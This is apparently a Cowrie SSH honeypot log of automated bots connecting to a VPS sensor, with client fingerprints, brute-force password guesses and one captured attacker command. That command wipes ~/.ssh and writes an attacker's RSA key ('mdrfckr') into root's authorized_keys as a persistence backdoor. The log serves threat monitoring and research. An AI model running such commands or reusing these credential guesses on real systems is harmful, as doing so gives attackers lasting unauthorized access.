{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T03:57:46.476945Z","src_ip":"152.32.190.168","session":"c69baf8721d1"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T03:57:46.477862Z","src_ip":"152.32.190.168","session":"c69baf8721d1"}
{"eventid":"cowrie.session.connect","src_ip":"152.32.190.168","src_port":42744,"dst_ip":"1.2.3.4","dst_port":22,"session":"92bea28cc4c8","protocol":"ssh","message":"New connection: 152.32.190.168:42744 (1.2.3.4:22) [session: 92bea28cc4c8]","sensor":"my-vps","timestamp":"2025-09-09T03:57:46.730168Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T03:57:46.730952Z","src_ip":"152.32.190.168","session":"92bea28cc4c8"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T03:57:46.984827Z","src_ip":"152.32.190.168","session":"92bea28cc4c8"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T03:57:48.040106Z","src_ip":"152.32.190.168","session":"92bea28cc4c8"}
{"eventid":"cowrie.session.connect","src_ip":"51.81.118.153","src_port":38928,"dst_ip":"1.2.3.4","dst_port":22,"session":"d3e7486c3cec","protocol":"ssh","message":"New connection: 51.81.118.153:38928 (1.2.3.4:22) [session: d3e7486c3cec]","sensor":"my-vps","timestamp":"2025-09-09T03:57:49.279827Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T03:57:49.280987Z","src_ip":"51.81.118.153","session":"d3e7486c3cec"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T03:57:49.295165Z","src_ip":"152.32.190.168","session":"92bea28cc4c8"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T03:57:49.376833Z","src_ip":"51.81.118.153","session":"d3e7486c3cec"}
{"eventid":"cowrie.session.connect","src_ip":"152.32.190.168","src_port":48832,"dst_ip":"1.2.3.4","dst_port":22,"session":"a64ba951e824","protocol":"ssh","message":"New connection: 152.32.190.168:48832 (1.2.3.4:22) [session: a64ba951e824]","sensor":"my-vps","timestamp":"2025-09-09T03:57:49.445520Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T03:57:49.447369Z","src_ip":"152.32.190.168","session":"a64ba951e824"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T03:57:49.650069Z","src_ip":"152.32.190.168","session":"a64ba951e824"}
{"eventid":"cowrie.login.success","username":"root","password":"Password1!","message":"login attempt [root/Password1!] succeeded","sensor":"my-vps","timestamp":"2025-09-09T03:57:49.802647Z","src_ip":"51.81.118.153","session":"d3e7486c3cec"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T03:57:50.015110Z","src_ip":"51.81.118.153","session":"d3e7486c3cec"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T03:57:50.015817Z","src_ip":"51.81.118.153","session":"d3e7486c3cec"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T03:57:50.016612Z","src_ip":"51.81.118.153","session":"d3e7486c3cec"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T03:57:50.113377Z","src_ip":"51.81.118.153","session":"d3e7486c3cec"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T03:57:50.422778Z","src_ip":"51.81.118.153","session":"d3e7486c3cec"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T03:57:50.423437Z","src_ip":"51.81.118.153","session":"d3e7486c3cec"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T03:57:50.499817Z","src_ip":"152.32.190.168","session":"a64ba951e824"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T03:57:50.522656Z","src_ip":"51.81.118.153","session":"d3e7486c3cec"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T03:57:50.523563Z","src_ip":"51.81.118.153","session":"d3e7486c3cec"}
{"eventid":"cowrie.session.connect","src_ip":"51.81.118.153","src_port":38932,"dst_ip":"1.2.3.4","dst_port":22,"session":"ad575c6fe98f","protocol":"ssh","message":"New connection: 51.81.118.153:38932 (1.2.3.4:22) [session: ad575c6fe98f]","sensor":"my-vps","timestamp":"2025-09-09T03:57:50.615318Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T03:57:50.616993Z","src_ip":"51.81.118.153","session":"ad575c6fe98f"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T03:57:50.703657Z","src_ip":"152.32.190.168","session":"a64ba951e824"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T03:57:50.712505Z","src_ip":"51.81.118.153","session":"ad575c6fe98f"}
{"eventid":"cowrie.session.closed","duration":"7.3","message":"Connection lost after 7.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T03:57:50.754738Z","src_ip":"152.32.190.168","session":"c69baf8721d1"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T03:57:51.134298Z","src_ip":"51.81.118.153","session":"ad575c6fe98f"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T03:57:52.232082Z","src_ip":"51.81.118.153","session":"ad575c6fe98f"}
{"eventid":"cowrie.session.connect","src_ip":"51.81.118.153","src_port":38936,"dst_ip":"1.2.3.4","dst_port":22,"session":"8fbbe5ba51f5","protocol":"ssh","message":"New connection: 51.81.118.153:38936 (1.2.3.4:22) [session: 8fbbe5ba51f5]","sensor":"my-vps","timestamp":"2025-09-09T03:57:52.338069Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T03:57:52.339086Z","src_ip":"51.81.118.153","session":"8fbbe5ba51f5"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T03:57:52.440845Z","src_ip":"51.81.118.153","session":"8fbbe5ba51f5"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T03:57:52.886729Z","src_ip":"51.81.118.153","session":"8fbbe5ba51f5"}
{"eventid":"cowrie.session.closed","duration":"3.7","message":"Connection lost after 3.7 seconds","sensor":"my-vps","timestamp":"2025-09-09T03:57:52.984593Z","src_ip":"51.81.118.153","session":"d3e7486c3cec"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T03:57:52.988375Z","src_ip":"51.81.118.153","session":"8fbbe5ba51f5"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":37936,"dst_ip":"1.2.3.4","dst_port":22,"session":"ec8a9b034df4","protocol":"ssh","message":"New connection: 212.227.235.229:37936 (1.2.3.4:22) [session: ec8a9b034df4]","sensor":"my-vps","timestamp":"2025-09-09T03:58:13.478530Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-09T03:58:13.480157Z","src_ip":"212.227.235.229","session":"ec8a9b034df4"}
{"eventid":"cowrie.client.kex","hassh":"f1e5e9d24e5e345e8745613bde22d532","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: f1e5e9d24e5e345e8745613bde22d532","sensor":"my-vps","timestamp":"2025-09-09T03:58:13.569082Z","src_ip":"212.227.235.229","session":"ec8a9b034df4"}
{"eventid":"cowrie.client.fingerprint","username":"admin","fingerprint":"2a:ec:77:c5:62:41:ca:44:18:b2:83:c9:14:e5:75:51","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAACAQCxpgkYt+zpKZ4aM5tZ9NynQP88iMSPIsgR4Jovfosly8NBvgRM7uyEmXefMNEvYvFkOqAdCwuLYx2woPHDvQcrenP1ftPQJxQ0lPJdb4FG2WHApem+EzM5aTK4cjPAncXQNTBz/npDFSpLp5IuLqfqNP3vgEvCmr6SsJ+nHdUdMUM95SY1Q9Hd9eYY1O+XBmYG5k/NjpiHwQQbXnZ9pfhrlpUe8ubQ0PklDDfNYICMggpp9rmJDrCVZMYTBXWoQn699dUrruiICT8GJMhmuAiUW0iFHqDbicnC7+fsMg6P0f0nJg659IMfXVtGttw7YWHjEgcRSpwThNc/Do9VOMghYiXlSUCpaKWp1febAPPfTzkA2bFlaD/kbIFLEYqIAwdZ987q4HRI6OjEZuqFTntMcsIRy4FEi9366KmZILnLTTa00r7tbPH86zWzTltg7HCqwz6WreyiQT/ZWwu3RTYCu376Ao27PO32D0lfg6PkOLvyK3709QOPqJoOzom6iRHifaFfFkFltOsUqrfhzRk4ckGBFaHUMhczGYcCAAhWOeQos/pMgvw+e8kKXc7qv99cvMDTa5Gf3OcWNjpTiJ0eY9uh3DVWn+XbIdUVcDJm4rykQTLM0RgEMTUco2OzEkzMl+5Lybf784utn51aBr2mZgrXTASFWCze/TbOjVP3bw==","type":"ssh-rsa","message":"public key attempt for user admin of type ssh-rsa with fingerprint 2a:ec:77:c5:62:41:ca:44:18:b2:83:c9:14:e5:75:51","sensor":"my-vps","timestamp":"2025-09-09T03:58:13.748936Z","src_ip":"212.227.235.229","session":"ec8a9b034df4"}
{"eventid":"cowrie.login.failed","username":"admin","fingerprint":"2a:ec:77:c5:62:41:ca:44:18:b2:83:c9:14:e5:75:51","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAACAQCxpgkYt+zpKZ4aM5tZ9NynQP88iMSPIsgR4Jovfosly8NBvgRM7uyEmXefMNEvYvFkOqAdCwuLYx2woPHDvQcrenP1ftPQJxQ0lPJdb4FG2WHApem+EzM5aTK4cjPAncXQNTBz/npDFSpLp5IuLqfqNP3vgEvCmr6SsJ+nHdUdMUM95SY1Q9Hd9eYY1O+XBmYG5k/NjpiHwQQbXnZ9pfhrlpUe8ubQ0PklDDfNYICMggpp9rmJDrCVZMYTBXWoQn699dUrruiICT8GJMhmuAiUW0iFHqDbicnC7+fsMg6P0f0nJg659IMfXVtGttw7YWHjEgcRSpwThNc/Do9VOMghYiXlSUCpaKWp1febAPPfTzkA2bFlaD/kbIFLEYqIAwdZ987q4HRI6OjEZuqFTntMcsIRy4FEi9366KmZILnLTTa00r7tbPH86zWzTltg7HCqwz6WreyiQT/ZWwu3RTYCu376Ao27PO32D0lfg6PkOLvyK3709QOPqJoOzom6iRHifaFfFkFltOsUqrfhzRk4ckGBFaHUMhczGYcCAAhWOeQos/pMgvw+e8kKXc7qv99cvMDTa5Gf3OcWNjpTiJ0eY9uh3DVWn+XbIdUVcDJm4rykQTLM0RgEMTUco2OzEkzMl+5Lybf784utn51aBr2mZgrXTASFWCze/TbOjVP3bw==","type":"ssh-rsa","message":"public key login attempt for [admin] failed","sensor":"my-vps","timestamp":"2025-09-09T03:58:13.749574Z","src_ip":"212.227.235.229","session":"ec8a9b034df4"}
{"eventid":"cowrie.client.fingerprint","username":"admin","fingerprint":"2a:ec:77:c5:62:41:ca:44:18:b2:83:c9:14:e5:75:51","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAACAQCxpgkYt+zpKZ4aM5tZ9NynQP88iMSPIsgR4Jovfosly8NBvgRM7uyEmXefMNEvYvFkOqAdCwuLYx2woPHDvQcrenP1ftPQJxQ0lPJdb4FG2WHApem+EzM5aTK4cjPAncXQNTBz/npDFSpLp5IuLqfqNP3vgEvCmr6SsJ+nHdUdMUM95SY1Q9Hd9eYY1O+XBmYG5k/NjpiHwQQbXnZ9pfhrlpUe8ubQ0PklDDfNYICMggpp9rmJDrCVZMYTBXWoQn699dUrruiICT8GJMhmuAiUW0iFHqDbicnC7+fsMg6P0f0nJg659IMfXVtGttw7YWHjEgcRSpwThNc/Do9VOMghYiXlSUCpaKWp1febAPPfTzkA2bFlaD/kbIFLEYqIAwdZ987q4HRI6OjEZuqFTntMcsIRy4FEi9366KmZILnLTTa00r7tbPH86zWzTltg7HCqwz6WreyiQT/ZWwu3RTYCu376Ao27PO32D0lfg6PkOLvyK3709QOPqJoOzom6iRHifaFfFkFltOsUqrfhzRk4ckGBFaHUMhczGYcCAAhWOeQos/pMgvw+e8kKXc7qv99cvMDTa5Gf3OcWNjpTiJ0eY9uh3DVWn+XbIdUVcDJm4rykQTLM0RgEMTUco2OzEkzMl+5Lybf784utn51aBr2mZgrXTASFWCze/TbOjVP3bw==","type":"ssh-rsa","message":"public key attempt for user admin of type ssh-rsa with fingerprint 2a:ec:77:c5:62:41:ca:44:18:b2:83:c9:14:e5:75:51","sensor":"my-vps","timestamp":"2025-09-09T03:58:13.839233Z","src_ip":"212.227.235.229","session":"ec8a9b034df4"}
